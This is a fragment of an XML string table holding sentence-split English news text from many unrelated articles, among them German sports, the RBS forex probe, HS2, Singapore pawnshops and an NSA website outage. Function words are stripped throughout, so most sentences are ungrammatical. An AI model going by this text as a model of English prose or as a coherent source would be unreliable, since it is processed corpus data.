    <t xml:space="preserve"> The chances relegated Ludwigsburg Budesliga basketball players remaining league improved </t>
  </si>
  <si>
    <t xml:space="preserve"> This wild card procedure , Neckar Riesen one applicant fewer </t>
  </si>
  <si>
    <t xml:space="preserve"> The Hamburg Towers basketball project declining make application possible stand-in place </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We participate wild card process , &amp;quot; said former national team player Pascal Roller , putting together concept professional club Hansa town since 2012 </t>
  </si>
  <si>
    <t xml:space="preserve"> However , sigh relief heard Ludwigsburg </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We concerning wild card process certain Düsseldorf receiving licence , &amp;quot; said boss Neckar Riesen Alexander Reil , speaking paper </t>
  </si>
  <si>
    <t xml:space="preserve"> Newly promoted Düsseldorf Baskets 23 May submit documents arbitration panel prove financial fitness Bundesliga </t>
  </si>
  <si>
    <t xml:space="preserve"> However , Rhineland team already refused licence twice </t>
  </si>
  <si>
    <t xml:space="preserve"> The Court Arbitration authority last resort </t>
  </si>
  <si>
    <t xml:space="preserve"> Networking universities companies important On visit district Breisgau-Hochschwarzwald , explained Parliamentary President Guido Wolf Titisee-Neustadt workforce tomorrow come </t>
  </si>
  <si>
    <t xml:space="preserve"> In Hochschwarzwald Support Centre , addressed important question alongside executive principals vocational colleges district grammar school chairs parents &amp;apos; council </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Education important factor location , &amp;quot; highlighted Claudia Stehle , Director Hans Thoma School , introduced networked Hochschwarzwald Education Centre Schools Project </t>
  </si>
  <si>
    <t xml:space="preserve"> During presentation , Wolf seemed impressed educational pilot project </t>
  </si>
  <si>
    <t xml:space="preserve"> Since 2011 , successful collaboration Wälderstadt Support Centre , District Grammar School Vocational School Complex </t>
  </si>
  <si>
    <t xml:space="preserve"> He also praised family-friendly approach within district </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It important , keep family life stage mind , , account demographic change , period spent providing long-term care support relatives well , &amp;quot; explained Wolf </t>
  </si>
  <si>
    <t xml:space="preserve"> He also stated increasing number employed persons looking long-term care support relatives </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Without support employer , resulting burden placed employees could result termination employment contract , &amp;quot; said Wolf </t>
  </si>
  <si>
    <t xml:space="preserve"> However , nobody afford lose qualified workers , &amp;quot; added </t>
  </si>
  <si>
    <t xml:space="preserve"> Another , particularly important factor networking universities companies </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; After , people learned merits region studies often remain within region , along acquired knowledge skills , contributes strengthening region , &amp;quot; said State Parliamentary President , expressing thorough conviction </t>
  </si>
  <si>
    <t xml:space="preserve"> For sufficient number educational places provided need skilled workers covered </t>
  </si>
  <si>
    <t xml:space="preserve"> In opinion , district &amp;apos;s advantage location advantageous location south-west Germany , immediate proximity France Switzerland </t>
  </si>
  <si>
    <t xml:space="preserve"> In addition , train journey Titisee-Neustadt Freiburg , experienced first-hand efforts already undertaken develop public transport </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; You must continue tenacious make sure local public transport becomes even better , &amp;quot; explained address given local politicians attendance </t>
  </si>
  <si>
    <t xml:space="preserve"> Illmensee: Second mountain bike race enthuses participants In fantastic weather , 214 cyclists came Illmensee take circuit , hills around lake </t>
  </si>
  <si>
    <t xml:space="preserve"> This announced Ulrich Knobel organising Illmensee Sports Club </t>
  </si>
  <si>
    <t xml:space="preserve"> Among participants also numerous amateur cyclists wanted chance practice hobby competitive environment , particular short distance 15 kilometres 300 metre climb </t>
  </si>
  <si>
    <t xml:space="preserve"> Two top-class junior cyclists also starting line-up competition: Felix Bader Bad Waldsee Pascal Treubel Aach-Linz came recommendation achieved good positions German Championships </t>
  </si>
  <si>
    <t xml:space="preserve"> The pair managed break away field keeping expectations </t>
  </si>
  <si>
    <t xml:space="preserve"> As case previous year , Felix Bader managed hold small lead right end defended title overall winner short distance race Once , Pascal Treubel took second place </t>
  </si>
  <si>
    <t xml:space="preserve"> In ladies &amp;apos; race Theresa Duelli Team Albtraum managed take top place podium </t>
  </si>
  <si>
    <t xml:space="preserve"> In second third places Anne Adel Illmensee Leonie Treiber Owingen </t>
  </si>
  <si>
    <t xml:space="preserve"> The increasing number riders live work area fantastic development </t>
  </si>
  <si>
    <t xml:space="preserve"> And top performance - entire range athletic ability represented </t>
  </si>
  <si>
    <t xml:space="preserve"> Participants &amp;apos; ages also wide-ranging , youngest starters ten years old oldest 70 </t>
  </si>
  <si>
    <t xml:space="preserve"> This year , even absolute top athletes starting line main race </t>
  </si>
  <si>
    <t xml:space="preserve"> Four cyclists managed break away top regional racers </t>
  </si>
  <si>
    <t xml:space="preserve"> These included Philipp Pangerl , semi-professional mountain biker Black Tusk Racing Team </t>
  </si>
  <si>
    <t xml:space="preserve"> Together team mate , Pangerl already twice crowned World Champion 12-hour race </t>
  </si>
  <si>
    <t xml:space="preserve"> This year became European Champion special discipline </t>
  </si>
  <si>
    <t xml:space="preserve"> Also competing Roland Ballerstedt , already claimed two German duathlon championships </t>
  </si>
  <si>
    <t xml:space="preserve"> After 45 kilometres climb 900 metres , leading riders neck neck final straight front Drei-Seen-Hall </t>
  </si>
  <si>
    <t xml:space="preserve"> Pangerl sped finish line first place </t>
  </si>
  <si>
    <t xml:space="preserve"> Only one second later , experienced Ballerstedt managed take second place overall standings </t>
  </si>
  <si>
    <t xml:space="preserve"> Hermann Warthmann reached finish line simultaneously take joint third overall standings </t>
  </si>
  <si>
    <t xml:space="preserve"> In ladies &amp;apos; race , Christiane Cohsmann achieved fastest time main race </t>
  </si>
  <si>
    <t xml:space="preserve"> Areane Blersch Binzwangen took second place , ahead Natascha Werner Stuttgart </t>
  </si>
  <si>
    <t xml:space="preserve"> Athletes assistants seemed satisfied smooth well-organised running event </t>
  </si>
  <si>
    <t xml:space="preserve"> RBS suspends two forex traders Royal Bank Scotland suspended two traders foreign exchange division according two people familiar situation , another sign global probe regulators suspected manipulation currency market rapidly gaining traction </t>
  </si>
  <si>
    <t xml:space="preserve"> Some world &amp;apos;s largest banks , including UBS , Barclays , Deutsche Bank RBS , confirmed co-operating regulators investigations world &amp;apos;s largest financial market , $ 5</t>
  </si>
  <si>
    <t xml:space="preserve">3tn changes hands day </t>
  </si>
  <si>
    <t xml:space="preserve"> The two traders would first RBS employees suspended widening probe echoes Libor interbank lending manipulation scandal </t>
  </si>
  <si>
    <t xml:space="preserve"> The bank , declined comment suspensions , confirmed month received requests information regulators </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Our ongoing inquiry matter continues co-operating fully FCA regulators , &amp;quot; bank said two weeks ago </t>
  </si>
  <si>
    <t xml:space="preserve"> Last month , people close situation said RBS turned records emails instant messages UK regulator , Financial Conduct Authority , sent former trader </t>
  </si>
  <si>
    <t xml:space="preserve"> This trader , Richard Usher , left RBS 2010 understand given leave current position European head forex spot trading JPMorgan </t>
  </si>
  <si>
    <t xml:space="preserve"> Rohan Ramchandani , head European spot trading Citi , went leave week , Matt Gardiner , former senior currencies trader Barclays UBS , suspended Standard Chartered week </t>
  </si>
  <si>
    <t xml:space="preserve"> None traders accused wrongdoing </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Usher &amp;apos;s instant message group included bankers Barclays Citigroup , people close situation said </t>
  </si>
  <si>
    <t xml:space="preserve"> UBS said week taken action employees Swiss regulator , Finma , said investigating suspected manipulation foreign exchange market number Swiss banks </t>
  </si>
  <si>
    <t xml:space="preserve"> At least six authorities globally - European Commission , Finma , Switzerland &amp;apos;s competition authority Weko , FCA , Department Justice US Hong Kong Monetary Authority - looking allegations bankers colluded move currencies market </t>
  </si>
  <si>
    <t xml:space="preserve"> HSBC , Citigroup , JPMorgan Credit Suisse also launched internal probes received requests information regulators , said people familiar situation </t>
  </si>
  <si>
    <t xml:space="preserve"> Banks scouring years &amp;quot; worth instant messages emails search instances wrongdoing </t>
  </si>
  <si>
    <t xml:space="preserve"> News probes rattled traders area one bigger profit drivers investment banks &amp;apos; trading units past years challenged year low volatility currencies cuts opportunities speculators </t>
  </si>
  <si>
    <t xml:space="preserve"> Some bankers tried play affair saying vast highly liquid foreign exchange market almost impossible manipulate , senior traders saying necessarily true </t>
  </si>
  <si>
    <t xml:space="preserve"> A senior trader said despite huge volume daily foreign exchange trading , fragmentation liquidity different trading platforms banks &amp;quot; increasing use internal platforms meant &amp;quot; start get impact market quite small ticket prices </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The news came day Credit Suisse announced dismissed trader London exchange traded funds desk week caused nearly $ 6m loss late last year </t>
  </si>
  <si>
    <t xml:space="preserve"> The bank promptly notified relevant authorities co-operating regulators </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We confident trader acted alone matter contained , &amp;quot; Credit Suisse said </t>
  </si>
  <si>
    <t xml:space="preserve"> A study aiming increase benefits Scotland HS2 rail project announced UK government </t>
  </si>
  <si>
    <t xml:space="preserve"> The work HS2 Ltd suggests high-speed services Scotland north England start soon Phase One opens 2026 </t>
  </si>
  <si>
    <t xml:space="preserve"> Transport minister Baroness Kramer said project would &amp;quot; bring UK together </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Scottish transport minister Keith Brown said &amp;quot; excited &amp;quot; work UK government plan </t>
  </si>
  <si>
    <t xml:space="preserve"> Phase One consist new high speed rail line London West Midlands </t>
  </si>
  <si>
    <t xml:space="preserve"> When Phase Two completed , lines run Manchester Leeds </t>
  </si>
  <si>
    <t xml:space="preserve"> In June government revised estimated cost building high-speed link London North England £ 32</t>
  </si>
  <si>
    <t>7bn £ 42</t>
  </si>
  <si>
    <t>6bn</t>
  </si>
  <si>
    <t xml:space="preserve"> The UK government , holding talks Transport Scotland , instructed HS2 Ltd look rail capacity journey time improvements northern England Scotland </t>
  </si>
  <si>
    <t xml:space="preserve"> This include possibility eventual journey times Glasgow Edinburgh London three hours less </t>
  </si>
  <si>
    <t xml:space="preserve"> Baroness Kramer said: &amp;quot; Our goal HS2 truly national network bring UK cities closer together </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We driving forward HS2 benefits bring huge </t>
  </si>
  <si>
    <t xml:space="preserve"> Without face crisis capacity rail network </t>
  </si>
  <si>
    <t xml:space="preserve"> But also connectivity , across UK 18 cities including Glasgow Edinburgh better connected HS2 </t>
  </si>
  <si>
    <t xml:space="preserve"> Scottish Secretary Alistair Carmichael added: &amp;quot; Today &amp;apos;s announcement good news Scotland </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; For Scottish government , Keith Brown called Mr Carmichael &amp;quot; unequivocally &amp;quot; back Scotland &amp;apos;s inclusion HS2 network </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Brown said: &amp;quot; High speed rail potential bring huge economic benefits Scotland , also adds Scotland &amp;apos;s economic weight overall case high speed rail across Britain </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; So excited work partnership UK Government examine options bringing high speed rail Scotland , creating benefit complementing Glasgow-Edinburgh line Scottish Government already planning </t>
  </si>
  <si>
    <t xml:space="preserve"> I look forward reviewing report investigation UK ministers next year together decide next steps </t>
  </si>
  <si>
    <t xml:space="preserve"> Pawnbrokers shine Singapore middle class feel pinch At pawnshop Bendemeer shopping centre Singapore , Janani Amirthalinga swapping gold bangle , ring pair earrings pay daughters &amp;quot; school fees </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; My husband I bought house money &amp;apos;s stuck , &amp;quot; Mrs Amirthalinga says </t>
  </si>
  <si>
    <t xml:space="preserve"> Even though earns S $ 3,000 ($ 2,400) month administrator husband works well , monthly family income insufficient , says </t>
  </si>
  <si>
    <t xml:space="preserve"> Indeed , demand across parts southeast Asia - household debt rising - ValueMax , carrying transaction , week became third pawnshop list Singapore stock exchange </t>
  </si>
  <si>
    <t xml:space="preserve"> Pawning jewellery merely fast way land cash - S $ 1,300 Ms Amirthalinga &amp;apos;s case - almost cheap unsecured bank loans </t>
  </si>
  <si>
    <t xml:space="preserve"> Typically pawnbrokers Singapore charge effective annual percentage rate 17 per cent , 15</t>
  </si>
  <si>
    <t xml:space="preserve">4 per cent offered United Overseas Bank , local lender branch shopping centre </t>
  </si>
  <si>
    <t xml:space="preserve"> However , pawnbrokers advantage requiring credit checks proof salary , arrange loans faster banks </t>
  </si>
  <si>
    <t xml:space="preserve"> Hence millions people across region turning pawnshops families feel squeeze rising living costs ballooning household consumer debt </t>
  </si>
  <si>
    <t xml:space="preserve"> After five years robust growth since global financial crisis , cheap credit fuelled loose monetary policy advanced economies , lower- middle-income families turning pawn shops make difference economies slow </t>
  </si>
  <si>
    <t xml:space="preserve"> This week Standard &amp;amp; Poor &amp;apos;s , rating agency , cited increasing household leverage , mainly rising mortgages , risk factor Asian banks &amp;quot; creditworthiness </t>
  </si>
  <si>
    <t xml:space="preserve"> It said Malaysia , Thailand Singapore highest household debt gross domestic product ratios Asia </t>
  </si>
  <si>
    <t xml:space="preserve"> Malaysia topped list 80 per cent GDP , 60 per cent 2008 </t>
  </si>
  <si>
    <t xml:space="preserve"> Economists also worried high levels consumer debt Thailand , week narrowly emerged technical recession </t>
  </si>
  <si>
    <t xml:space="preserve"> On Thursday , data showed continued export weakness , softening consumer demand </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Bottom line costs rising , people middle lower end &amp;#91; income scale &amp;#93; looking supplement income wherever , &amp;quot; says Song Seng Wun , economist CIMB , Malaysian bank </t>
  </si>
  <si>
    <t xml:space="preserve"> Historically high prices gold past two years added rush pawn personal belongings , people take opportunity cash value family jewellery </t>
  </si>
  <si>
    <t xml:space="preserve"> In Singapore , 70 per cent items pawned city-state &amp;apos;s 200 pawn outlets gold </t>
  </si>
  <si>
    <t xml:space="preserve"> People saying &amp;quot; gold price looks good , let &amp;apos;s pawn grandma &amp;apos;s gold chain get back next month </t>
  </si>
  <si>
    <t xml:space="preserve"> In Thailand largest pawnshop operator , EasyMoney , seen 20 per cent rise number customers using outlets recent months </t>
  </si>
  <si>
    <t xml:space="preserve"> Such growth pawn business ValueMax , operator outlet Bendemeer 15 others like Singapore , plans expand neighbouring Malaysia - four shops - outside Asia , says Yeah Lee Ching , ValueMax &amp;apos;s executive director </t>
  </si>
  <si>
    <t xml:space="preserve"> The company fund using 60 per cent S $ 66m raised week listing Singapore stock exchange </t>
  </si>
  <si>
    <t xml:space="preserve"> While discount lenders come fire high interest rates , Ms Yeah says pawning offer cheaper rates lenders , also add directly debt </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Customers mortgaging items already , monetising personal assets increase household debt , &amp;quot; says </t>
  </si>
  <si>
    <t xml:space="preserve"> There &amp;apos;s increased social acceptance pawnbroking means secure short term , secured financing </t>
  </si>
  <si>
    <t xml:space="preserve"> Nor types people use pawnbrokers financially stretched </t>
  </si>
  <si>
    <t xml:space="preserve"> Wealthy people Singapore also use ValueMax outlets , pawning gold bars Rolex watches , command 60 per cent purchase price cash </t>
  </si>
  <si>
    <t xml:space="preserve"> We see customers walks life </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; They include wealthy individuals need borrow short term business ventures investments , small businesses need tide cash flow needs , &amp;quot; says Ms Yeah </t>
  </si>
  <si>
    <t xml:space="preserve"> Sometimes need money quickly </t>
  </si>
  <si>
    <t xml:space="preserve"> Jumbo visits home Black Forest ham Jumbo search &amp;quot; world &amp;apos;s best ham &amp;quot;: For TV programme &amp;quot; Galileo &amp;quot; , Pro7 star visited Bonndorf </t>
  </si>
  <si>
    <t xml:space="preserve"> The presenter established one thing right outset: The important thing comes ham legs pork - turbo fattening provide good basis </t>
  </si>
  <si>
    <t xml:space="preserve"> Can ham bought supermarket good quality product ? Uli , boss large ham factory Schwarzwald , explained Jumbo Bonndorf company , &amp;quot; Adler &amp;quot; , operates </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Germany &amp;apos;s most-loved ham , &amp;quot; said Jumbo , presenting Black Forest ham </t>
  </si>
  <si>
    <t xml:space="preserve"> He could enter factory wearing hair protection white coat </t>
  </si>
  <si>
    <t xml:space="preserve"> Jumbo also first disinfect hands could reach microphone </t>
  </si>
  <si>
    <t xml:space="preserve"> Jumbo seen getting something keep going fast food restaurant Waldshut &amp;quot; Here work huge quantities , &amp;quot; commented television producers , astonished mass production Black Forest ham </t>
  </si>
  <si>
    <t xml:space="preserve"> 16,000 joints meat per week speak </t>
  </si>
  <si>
    <t xml:space="preserve"> Weight , fat content colour: Uli explained required best quality </t>
  </si>
  <si>
    <t xml:space="preserve"> The majority pigs slaughtered six months old </t>
  </si>
  <si>
    <t xml:space="preserve"> Television standards ? Even specific details pH value meat play role </t>
  </si>
  <si>
    <t xml:space="preserve"> The darker meat , higher pH value </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I would curious would happen measure Roberto Blanco , &amp;quot; said Jumbo cynically </t>
  </si>
  <si>
    <t xml:space="preserve"> Here standard private television production presented purest form </t>
  </si>
  <si>
    <t xml:space="preserve"> Nonetheless , worth watching </t>
  </si>
  <si>
    <t xml:space="preserve"> The viewer sees joints still carved hand </t>
  </si>
  <si>
    <t xml:space="preserve"> After all: Black Forest ham traditionally arrives shelf boneless </t>
  </si>
  <si>
    <t xml:space="preserve"> The secret ham mix herbs combined salt </t>
  </si>
  <si>
    <t xml:space="preserve"> The appearance smoking tower furnace remind Jumbo submarine </t>
  </si>
  <si>
    <t xml:space="preserve"> The trick: Here fir branches smoker provide special flavour Black Forest ham </t>
  </si>
  <si>
    <t xml:space="preserve"> After 20 days smoke , ham finally almost black </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; And slice disappear inside Jumbo , &amp;quot; said , announcing sampling product </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; That really delicious , &amp;quot; said TV star conclusion </t>
  </si>
  <si>
    <t xml:space="preserve"> All involved happy evaluation </t>
  </si>
  <si>
    <t xml:space="preserve"> Living future-oriented perspective If truth told , Waltraud Ries , lives dreamy life </t>
  </si>
  <si>
    <t xml:space="preserve"> Her house located peaceful neighbourhood Stuttgart , plenty greenery , old tree population , nice neighbours much traffic </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Hopefully &amp;apos;t afraid spiders ? &amp;quot; asks Waltraud Ries , pointing large spider door frame </t>
  </si>
  <si>
    <t xml:space="preserve"> I looking new home husband time </t>
  </si>
  <si>
    <t xml:space="preserve"> But know difficult Stuttgart </t>
  </si>
  <si>
    <t xml:space="preserve"> However , reason desire move arachnophobia , rather fear able manage large number steps house , inside home old age , explained </t>
  </si>
  <si>
    <t xml:space="preserve"> Furthermore: Since undergoing meniscus operation , lady , mid-fifties , experience means move floor floor disability </t>
  </si>
  <si>
    <t xml:space="preserve"> Only recently , released book subject &amp;quot; Living happily old age - Which type property best ? &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Our home best example property simply &amp;apos;t work old age , &amp;quot; begins recount </t>
  </si>
  <si>
    <t xml:space="preserve"> When moved maisonette husband 20 years ago , simply pretty apartment green surroundings </t>
  </si>
  <si>
    <t xml:space="preserve"> Now , mid-fifties , Waltraud Ries different thoughts </t>
  </si>
  <si>
    <t xml:space="preserve"> However , aware one people actually deal topic &amp;apos; living old age &amp;apos; </t>
  </si>
  <si>
    <t xml:space="preserve"> The majority people put back minds long possible </t>
  </si>
  <si>
    <t xml:space="preserve"> Only people get old , says , smirking </t>
  </si>
  <si>
    <t xml:space="preserve"> Only psychological strain becomes severe people give consideration </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; But stage late , &amp;quot; said Ries </t>
  </si>
  <si>
    <t xml:space="preserve"> In book , interior decorator presents 17 housing models independent living old age </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; However , type residence choose always personal decision , &amp;quot; explains </t>
  </si>
  <si>
    <t xml:space="preserve"> There solution overcoming old age </t>
  </si>
  <si>
    <t xml:space="preserve"> Even afford spend retirement Tuscany Brittany , always take fact may become ill consideration </t>
  </si>
  <si>
    <t xml:space="preserve"> And: &amp;apos; Without sound knowledge local language , even become lonely living dolce vita , &amp;apos; added author , providing food thought seeking move abroad </t>
  </si>
  <si>
    <t xml:space="preserve"> Her models include classic care models , alternative living arrangements often-mentioned pensioners &amp;apos; living community </t>
  </si>
  <si>
    <t xml:space="preserve"> In old age everyone quirks ticks </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;apos; However , type residential community would , &amp;apos; commented wink </t>
  </si>
  <si>
    <t xml:space="preserve"> Definitely nothing like student accommodation shared bathroom kitchen </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;apos; In old age simply need space withdraw , &amp;apos; said Ries </t>
  </si>
  <si>
    <t xml:space="preserve"> However , author wish rule possibility pensioners &amp;apos; residential community work </t>
  </si>
  <si>
    <t xml:space="preserve"> However , must operate differently classic student digs </t>
  </si>
  <si>
    <t xml:space="preserve"> And sometimes also want peace quiet , &amp;apos; believes </t>
  </si>
  <si>
    <t xml:space="preserve"> With opinion least alone State Capital </t>
  </si>
  <si>
    <t xml:space="preserve"> The experience Theresa Rütten , head citizen &amp;apos;s Life Old Age service State Capital , also &amp;apos; majority old people Stuttgart want remain homes long possible &amp;apos; </t>
  </si>
  <si>
    <t xml:space="preserve"> Her agency agency advises people topic &amp;apos; growing old &amp;apos; </t>
  </si>
  <si>
    <t xml:space="preserve"> Therefore experience Stiftung Warentest consumer study also elderly people particular would accept inconveniences limitations able remain usual environment </t>
  </si>
  <si>
    <t xml:space="preserve"> Nowadays many possibilities designing house apartment way barrier-free </t>
  </si>
  <si>
    <t xml:space="preserve"> Ries recommends working age-appropriate renovation house apartment first seek in-depth information &amp;apos;t simply use first tradesman comes along </t>
  </si>
  <si>
    <t xml:space="preserve"> Nowadays specialists renovation suit needs elderly </t>
  </si>
  <si>
    <t xml:space="preserve"> Even case rental apartments landlords work carried , even matter raising level toilet seat , clarified interior designer </t>
  </si>
  <si>
    <t xml:space="preserve"> However , always case existing apartment made age-appropriate therefore barrier-free , even beautiful ever </t>
  </si>
  <si>
    <t xml:space="preserve"> Waltraud Ries go experience </t>
  </si>
  <si>
    <t xml:space="preserve"> You could course install stair lift inside apartment , cobbled path door apartment , featuring number steps would much greater hindrance </t>
  </si>
  <si>
    <t xml:space="preserve"> Vienna Airport abolishes passenger call-outs Mr</t>
  </si>
  <si>
    <t xml:space="preserve"> Max Maier , please make way Gate 24 </t>
  </si>
  <si>
    <t xml:space="preserve"> In future , announcements longer happen Vienna International Airport </t>
  </si>
  <si>
    <t xml:space="preserve"> The majority loudspeaker announcements cease - thus considerably reducing noise level </t>
  </si>
  <si>
    <t xml:space="preserve"> The goal adjustment create relaxing atmosphere </t>
  </si>
  <si>
    <t xml:space="preserve"> As airport spokesperson Peter Kleeman announced Radio Vienna adjusting approach towards announcements , Vienna Airport following international trend </t>
  </si>
  <si>
    <t xml:space="preserve"> Among others , airports Kopenhagen , Frankfurt Dubai already done away noisy call-outs </t>
  </si>
  <si>
    <t xml:space="preserve"> By away announcements - average around 200 personal call-outs come loudspeakers per day - atmosphere airport calmer future </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Experience also shown individual announcements relatively seldom taken notice , time , information regarding changes departure gates flight times somewhat lost among , &amp;quot; said Kleeman chatting radio broadcaster </t>
  </si>
  <si>
    <t xml:space="preserve"> British police serve Assange extradition notice Btitish police served extradition notice today WikiLeaks founder Julian Assange , taken refuge Ecuador &amp;apos;s embassy London requested asylum </t>
  </si>
  <si>
    <t xml:space="preserve"> Scotland Yard said served &amp;quot; surrender notice &amp;quot; 40-year-old Australian requiring appear police station , adding failure would make liable arrest </t>
  </si>
  <si>
    <t xml:space="preserve"> Assange faces extradition Sweden sex crime allegations , exhausted options British law Supreme Court overturned appeal extradition earlier month </t>
  </si>
  <si>
    <t xml:space="preserve"> Fearing Stockholm would pass US , sought refuge Ecuador &amp;apos;s embassy London June 19 , asking South American country political asylum </t>
  </si>
  <si>
    <t xml:space="preserve"> Scotland Yard &amp;quot; served surrender notice upon 40-year-old man requires attend police station date time choosing , &amp;quot; spokesman said </t>
  </si>
  <si>
    <t xml:space="preserve"> He remains breach bail conditions </t>
  </si>
  <si>
    <t xml:space="preserve"> The embassy declined comment serving police notice </t>
  </si>
  <si>
    <t xml:space="preserve"> Assange fears extradited Sweden United States face possible espionage charges , releasing 250,000 US diplomatic cables WikiLeaks anti-secrecy website </t>
  </si>
  <si>
    <t xml:space="preserve"> Worker falls ladder: seriously injured On Thursday , 51-year-old worker Eggelsberg fell ladder replacing broken external sensor seriously injured </t>
  </si>
  <si>
    <t xml:space="preserve"> The man Lamprechtshausen wanted replace broken heating sensor external facade guest house </t>
  </si>
  <si>
    <t xml:space="preserve"> As climbing ladder , resting roof guttering , slipped away man fell onto concrete </t>
  </si>
  <si>
    <t xml:space="preserve"> He suffered serious injuries taken &amp;quot; Christophorus 6 &amp;quot; rescue helicopter Salzburg Regional Hospital </t>
  </si>
  <si>
    <t xml:space="preserve"> NSA Blames &amp;quot; Internal Error , &amp;quot; Not Hackers , For Website Crash The shadowy National Security Agency said late Friday glitch brought public website hours , hackers claimed online </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; NSA</t>
  </si>
  <si>
    <t xml:space="preserve">gov accessible several hours tonight internal error occurred scheduled update , &amp;quot; spy agency said emailed statement </t>
  </si>
  <si>
    <t xml:space="preserve"> The issue resolved evening </t>
  </si>
  <si>
    <t xml:space="preserve"> Claims outage caused distributed denial service &amp;#91; DDoS &amp;#93; attack true </t>
  </si>
  <si>
    <t xml:space="preserve"> Earlier evening online server trackers noted NSA &amp;apos;s website least six hours , site continues inaccessible users </t>
  </si>
  <si>
    <t xml:space="preserve"> Earlier NSA spokesperson told ABC News agency &amp;apos;s internal , sensitive network &amp;quot; &amp;quot; compromised </t>
  </si>
  <si>
    <t xml:space="preserve"> No classified information danger , spokesperson said </t>
  </si>
  <si>
    <t xml:space="preserve"> At least one hacktivist group online claimed responsible bringing NSA site DDoS attack </t>
  </si>
  <si>
    <t xml:space="preserve"> DDoS attacks designed flood target website traffic servers overloaded site collapses </t>
  </si>
  <si>
    <t xml:space="preserve"> The cyber tactic relatively unsophisticated one attacks meant penetrate internal network target system </t>
  </si>
  <si>
    <t xml:space="preserve"> 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 </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> Following great success musical , &amp;quot; Rock Life &amp;quot; , enthused audiences past Spring , Liederkranz bless two church services performance Franz Schubert &amp;apos;s Deutsche Messe , close anniversary year celebrations </t>
  </si>
  <si>
    <t xml:space="preserve"> On Saturday 26 October , exceptional mass heard 7</t>
  </si>
  <si>
    <t xml:space="preserve"> evening mass St</t>
  </si>
  <si>
    <t xml:space="preserve"> Marinuskirche Dunningen Sunday 27 October , 10</t>
  </si>
  <si>
    <t>15 , service St</t>
  </si>
  <si>
    <t xml:space="preserve"> Johannes Baptistkirche Lackendorf </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> Patron Johan Philipp Neumann mind mass performed part church services </t>
  </si>
  <si>
    <t xml:space="preserve"> Under directorship Hermann Schneider , choir accompanied wind ensemble Frohsinn Tennenbronn Music Society , Noemi Lokodi organ </t>
  </si>
  <si>
    <t xml:space="preserve"> Council sets sights rail system Should &amp;quot; Am Hirschen &amp;quot; railway crossing reconstructed great cost , order increase traffic safety ? The Town Councils decided answer yes </t>
  </si>
  <si>
    <t xml:space="preserve"> Schiltach contribute EUR 220,000 project </t>
  </si>
  <si>
    <t xml:space="preserve"> The Deutsche Bahn hopes improve Kinzigtal railway line coming year </t>
  </si>
  <si>
    <t xml:space="preserve"> In particular , safety railway crossings increased - collisions trains vehicles frequently occur across country </t>
  </si>
  <si>
    <t xml:space="preserve"> If municipalities agree reconstruction measures , required contribute one third costs , remainder divided Deutsche Bahn Federal Government </t>
  </si>
  <si>
    <t xml:space="preserve"> Schiltach &amp;apos;s town master mason , Roland Grießhaber , explained peculiarities &amp;quot; Am Hirschen &amp;quot; railway crossing Town Council </t>
  </si>
  <si>
    <t xml:space="preserve"> At crossing , town planning increase height mouth tunnel west railway line </t>
  </si>
  <si>
    <t xml:space="preserve"> Larger vehicles , example transport long logs , would able wait event oncoming traffic , without block railway line </t>
  </si>
  <si>
    <t xml:space="preserve"> Grießhaber therefore suggested required supporting wall constructed way town could due course widen adjoining street order guarantee smooth flow traffic </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> Even wood &amp;quot; Kuhbach &amp;quot; area occasionally transported via route , vehicles , measure 20 metres length , would able use route via Häberles Bridge , would able make turn Hauptstrasse </t>
  </si>
  <si>
    <t xml:space="preserve"> Furthermore , Hauptstrasse blocked , route would also serve bypass vehicles permitted use tunnel , argued Haas </t>
  </si>
  <si>
    <t xml:space="preserve"> Given likely Kirchberg Schlossberg tunnel reconstructed renovated , currently case Wolfach , &amp;quot; Am Hirschen &amp;quot; railway crossing may become major traffic significance longer period time </t>
  </si>
  <si>
    <t xml:space="preserve"> The councillors agreed investigation conducted costs planned widening road would incur </t>
  </si>
  <si>
    <t xml:space="preserve"> Nevertheless , reconstruction railway crossing consented majority , provision required supporting wall built way town could , required , extend connecting road &amp;quot; Bahnhofstraße &amp;quot; direction around 5</t>
  </si>
  <si>
    <t xml:space="preserve">5 metres accommodate oncoming traffic </t>
  </si>
  <si>
    <t xml:space="preserve"> The reconstruction railway crossing Trautwein tannery could , hand , bring entirely different problem regard access steep &amp;quot; Geroltzhäuser Weg &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> The Administrative Department Deutsche Bahn &amp;apos;s reconstruction plans investigated Breinlinger Engineering Office , doubts whether planned connection Geroltzhäuser Weg straightforward </t>
  </si>
  <si>
